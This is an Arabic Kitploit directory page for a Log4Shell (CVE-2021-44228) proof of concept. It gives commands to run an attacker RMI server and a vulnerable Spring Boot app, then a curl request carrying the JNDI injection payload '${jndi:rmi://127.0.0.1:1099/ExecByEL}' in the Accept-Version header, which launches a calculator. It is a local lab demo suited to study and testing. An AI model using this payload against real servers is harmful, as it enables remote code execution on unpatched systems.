Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-rmi-poc — إثبات مفهوم لثغرات Log4j (CVE-2021-44228) عبر Java-RMI | Kitploit
أدوات/GitHubGitHub/labout/log4shell-rmi-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHublabout/log4shell-rmi-poc

log4shell-rmi-poc

إثبات مفهوم لثغرات Log4j (CVE-2021-44228) عبر Java-RMI

عرض المستودع
84منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4shell-rmi-poc

إثبات مفهوم لثغرة Log4j (CVE-2021-44228) عبر Java-RMI
يستخدم Log4j 2.5.7 من spring-boot-starter-log4j2

المتطلبات:

تم الاختبار مع Java 8 (JDK 1.8.0_25) وJava 11 (JDK 11.0.1)

كيفية تشغيل الإثبات

1. استنساخ المستودع:

root@kitploit:~
git clone https://github.com/Labout/log4shell-rmi-poc.git

2. تشغيل خادم RMI الخاص بالمهاجم

root@kitploit:~
cd Log4jshell_rmi_server

./mvnw clean package

java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar

يجب أن تحصل على شيء مثل هذا:

rmi server

3. تشغيل تطبيق Log4j المعرّض للثغرة (هنا تطبيق Spring Boot)

في نافذة طرفية جديدة

root@kitploit:~
cd vulnerabel_log4j_app

./mvnw clean package

java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar

4. حقن JNDI معرّض للثغرة عبر الترويسة "Accept-version"

root@kitploit:~
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'

كما ترى، يقوم التطبيق المعرّض للثغرة باستدعاء تطبيق الآلة الحاسبة.

exploit

المراجع

https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
https://www.lunasec.io/docs/blog/log4j-zero-day/

تنزيل الأداة